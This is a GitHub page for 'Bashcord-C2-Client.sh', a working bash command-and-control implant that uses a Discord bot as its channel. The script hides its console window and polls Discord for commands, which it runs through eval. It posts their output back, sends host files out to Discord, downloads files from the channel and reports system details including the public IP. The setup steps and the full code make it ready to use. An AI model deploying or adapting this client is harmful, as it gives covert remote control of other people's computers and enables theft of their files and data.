-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathBashcord-C2-Client.sh
321 lines (279 loc) · 12.8 KB
/
Bashcord-C2-Client.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
#!/bin/bash
# ================================= BashCord C2 Client ======================================
# Using bash to send and receive commands from discord into a bash shell (on any system!)
# Works on Linux, MacOS and Windows
# **SETUP**
# 1. make a discord bot at https://discord.com/developers/applications/
# 2. Turn on ALL intents in the 'Bot' tab.
# 3. Give these permissions in Oauth2 tab and copy link into a browser url bar (Send-Messages, Read-messages/view-channels, Attach files)
# 4. Add the bot to your server
# 5. Click 'Reset Token' in "Bot" tab for your token
# 6. Change YOUR_BOT_TOKEN_HERE below with your bot token
# 7. Change CHANNEL_ID_HERE below to the channel ID of your channel.
# 8. Change BOT_USER_ID_HERE below to your bots user ID.
token="YOUR_BOT_TOKEN_HERE" # Your bot intents should be on and 'read messages' permissions when joining your server
chan="CHANNEL_ID_HERE" # On Discord app rightclick the channel > 'Copy Channel ID' (Make sure the bot can access this channel)
bot_id="BOT_USER_ID_HERE" # Settings > Advanced > Developer mode ON -- then On Discord app rightclick the bot > 'Copy User ID'
HideWindow=1 # 1 = hide console window
generate_random_letters() {
local letters="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
local password=""
for i in {1..7}; do
random_index=$((RANDOM % ${#letters}))
password+=${letters:$random_index:1}
done
echo "$password"
sleep 1
}
HideConsole() {
if [ $HideWindow -gt 0 ]; then
if [ "$(expr substr $(uname -s) 1 5)" = "MINGW" ]; then
powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c exit' -NoNewWindow -Wait"
else
osascript -e 'tell application "Terminal" to set visible of window 1 to false'
fi
fi
}
Authenticate() {
if [[ "$command_result" == *"$password"* ]]; then
authenticated=1
cwd=$(pwd)
json_payload="{
\"content\": \"\",
\"embeds\": [
{
\"title\": \":white_check_mark: **Session Connected** :white_check_mark:\",
\"description\": \"\`PS: $cwd >\`\",
\"color\": 16777215
}
]
}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
else
authenticated=0
fi
}
Option_List() {
json_payload="{
\"content\": \"\",
\"embeds\": [
{
\"title\": \":white_check_mark: **Session Connected** :white_check_mark:\",
\"description\": \"**OPTIONS LIST**\n\n- **options** - Show the options list\n- **pause** - Pause this session (re-authenticate to resume)\n- **close** - Close this session permanently\n- **upload** - Upload a file to Discord [upload path/to/file.txt]\n- **download** - Download file to client [attach to 'download' command]\",
\"color\": 16777215
}
]
}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
}
get_recent_message() {
recent_message=$(curl -s -H "Authorization: Bot $token" "https://discord.com/api/v9/channels/$chan/messages?limit=1")
user_id=$(echo "$recent_message" | grep -o '"author":{"id":"[^"]*' | grep -o '[^"]*$')
bot_check=$(echo "$recent_message" | grep -o '"bot":true')
if [ -n "$user_id" ] && [ -z "$bot_check" ]; then
recent_message=$(echo "$recent_message" | sed -n 's/.*"content":"\([^"]*\)".*/\1/p' | head -n 1)
echo "$recent_message"
else
echo ""
fi
}
sanitize_json() {
sanitized_result="${1//\"/\\\"}"
sanitized_result="${sanitized_result//\\/\\\\}"
sanitized_result="${sanitized_result//\\n/\\\\n}"
sanitized_result="${sanitized_result//\\ / }"
echo "$sanitized_result"
}
get_linux_info() {
os_info=$(uname -a)
kernel_version=$(uname -r)
uptime=$(uptime -p)
cpu_info=$(cat /proc/cpuinfo | grep "model name" | head -n 1 | cut -d ":" -f 2 | sed 's/^[ \t]*//')
mem_info=$(free -h | grep "Mem" | awk '{print "Total: " $2, " Used: " $3}')
disk_info=$(df -h --total | grep "total" | awk '{print "Total disk space: " $2, " Used: " $3}')
public_ip=$(curl -s https://api.ipify.org)
linux_info="OS Info: $os_info\nKernel Version: $kernel_version\nUptime: $uptime\nCPU: $cpu_info\nMemory: $mem_info\nDisk: $disk_info\nPublic IP: $public_ip"
echo "$linux_info"
}
get_macos_info() {
os_info=$(uname -a)
kernel_version=$(uname -r)
uptime=$(uptime -p)
cpu_info=$(sysctl -n machdep.cpu.brand_string)
mem_info=$(system_profiler SPHardwareDataType | grep "Memory" | awk '{print "Total: " $2, " Used: " $4}')
disk_info=$(df -h / | grep "/dev/" | awk '{print "Total disk space: " $2, " Used: " $3}')
public_ip=$(curl -s https://api.ipify.org)
macos_info="OS Info: $os_info\nKernel Version: $kernel_version\nUptime: $uptime\nCPU: $cpu_info\nMemory: $mem_info\nDisk: $disk_info\nPublic IP: $public_ip"
echo "$macos_info"
}
get_windows_info() {
os_info=$(systeminfo | grep "OS Name")
uptime=$(systeminfo | grep "System Boot Time")
cpu_info=$(wmic cpu get caption | grep -v "Caption")
mem_info=$(systeminfo | grep "Total Physical Memory")
disk_info=$(wmic logicaldisk get size,freespace,caption | grep "C:")
public_ip=$(curl -s https://api.ipify.org)
manufacturer=$(wmic computersystem get manufacturer | grep -v "Manufacturer")
model=$(wmic computersystem get model | grep -v "Model")
windows_version=$(uname -a)
windows_info="$os_info\n$uptime\nCPU: $cpu_info\n$mem_info\nDisk: $disk_info\nPublic IP: $public_ip\nManufacturer: $manufacturer\nModel: $model\nWindows Version: $windows_version"
echo "$windows_info"
}
send_file_to_discord() {
local file_path="$1"
local token="$token"
local chan="$chan"
if [ -z "$file_path" ]; then
echo "Error: File path not provided."
return 1
fi
if [ ! -f "$file_path" ]; then
echo "Error: File does not exist at $file_path."
return 1
fi
local file_name=$(basename "$file_path")
curl -X POST \
-H "Authorization: Bot $token" \
-F "file=@$file_path;filename=$file_name" \
"https://discord.com/api/v9/channels/$chan/messages"
}
download_attachment() {
recent_message=$(curl -s -H "Authorization: Bot $token" "https://discord.com/api/v9/channels/$chan/messages?limit=1")
user_id=$(echo "$recent_message" | grep -o '"author":{"id":"[^"]*' | grep -o '[^"]*$')
bot_check=$(echo "$recent_message" | grep -o '"bot":true')
if [ -n "$user_id" ] && [ -z "$bot_check" ]; then
echo ""
else
echo ""
fi
# Extract attachment URL from recent message using pattern matching
attachment_url=$(echo "$recent_message" | grep -oE 'https://cdn\.discordapp\.com/attachments/[^"]+')
# Check if attachment URL exists
if [ -n "$attachment_url" ]; then
echo "Received 'download' command with attachment URL: $attachment_url"
# Extract the filename from the URL
file_name=$(basename "$attachment_url")
# Download the file using curl
curl -O -J -L "$attachment_url"
# Check if the download was successful
if [ $? -eq 0 ]; then
echo "File downloaded successfully: $file_name"
else
echo "Error downloading file from URL: $attachment_url"
fi
else
echo "No attachment found or invalid command for download."
fi
}
execute_command() {
command_result=$(eval "$1" 2>&1)
if [ "$authenticated" -eq 1 ]; then
if [ "$1" == "close" ]; then
echo "Received 'close' command. Exiting Session..."
json_payload='{"content": ":octagonal_sign: **Session Closed** :octagonal_sign:"}'
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
Sleep 1
exit 0
fi
if [ "$1" == "pause" ]; then
echo "Received 'pause' command. Pausing Session..."
authenticated=0
json_payload="{\"content\": \":pause_button: **Session Paused** | Connect Code : \`$password \` :pause_button:\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
return
fi
if [ "$1" == "download" ]; then
echo "Received 'Download' command."
command="$1"
download_attachment
return
fi
if [ "$1" == "options" ]; then
echo "Received 'Options' command."
Option_List
return
fi
command="$1"
command_args="${command#* }"
if [[ "$command" == "upload"* && -n "$command_args" ]]; then
echo "Received 'upload' command with file path: $command_args"
send_file_to_discord "$command_args" # Call the function to send the file
return
fi
if [ "$1" == "sysinfo" ]; then
echo "Received 'sysinfo' command. Retrieving system information..."
case "$(uname -s)" in
Linux*) sys_info=$(get_linux_info);;
Darwin*) sys_info=$(get_macos_info);;
CYGWIN*) sys_info=$(get_windows_info);;
MINGW*) sys_info=$(get_windows_info);;
*) sys_info="Unsupported OS" ;;
esac
json_payload="{\"content\": \"\`\`\`$sys_info\`\`\`\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
return
fi
if [ $? -eq 0 ]; then
if [ -n "$command_result" ]; then
temp_file=$(mktemp)
echo "$command_result" > "$temp_file"
accumulated_lines=""
while IFS= read -r line; do
sanitized_line=$(sanitize_json "$line")
if [ $((${#accumulated_lines} + ${#sanitized_line})) -gt 1900 ]; then
json_payload="{\"content\": \"\`\`\`$accumulated_lines\`\`\`\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
accumulated_lines="$sanitized_line"
Sleep 1
else
accumulated_lines="$accumulated_lines\n$sanitized_line"
fi
done < "$temp_file"
if [ -n "$accumulated_lines" ]; then
json_payload="{\"content\": \"\`\`\`$accumulated_lines\`\`\`\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
fi
rm "$temp_file"
else
cwd=$(pwd)
json_payload="{\"content\": \":white_check_mark: **Command Executed** :white_check_mark: \n\`PS: $cwd >\`\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
fi
else
error_message=$(echo "$command_result" | tr -d '\n' | sed 's/"/\\"/g')
json_payload="{\"content\": \"\`\`\`$command_result\`\`\`\"}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
fi
else
Authenticate
fi
}
random_letters=$(generate_random_letters)
password="${password}${random_letters}"
last_command_file=$(mktemp)
HideConsole
json_payload="{
\"content\": \"\",
\"embeds\": [
{
\"title\": \":hourglass: Session Waiting :hourglass:\",
\"description\": \"**Session Code** : \`$password\`\",
\"color\": 16777215
}
]
}"
curl -X POST -H "Authorization: Bot $token" -H "Content-Type: application/json" -d "$json_payload" "https://discord.com/api/v9/channels/$chan/messages"
while true; do
recent_message=$(get_recent_message)
if [[ ! -z $recent_message && $recent_message != $(cat $last_command_file 2>/dev/null) ]]; then
if [[ "$recent_message" =~ ^cd\ ]]; then
cd_command=$(echo "$recent_message" | awk '{print $2}')
cd "$cd_command"
execute_command "pwd"
else
execute_command "$recent_message"
fi
echo "$recent_message" > $last_command_file
fi
sleep 5
done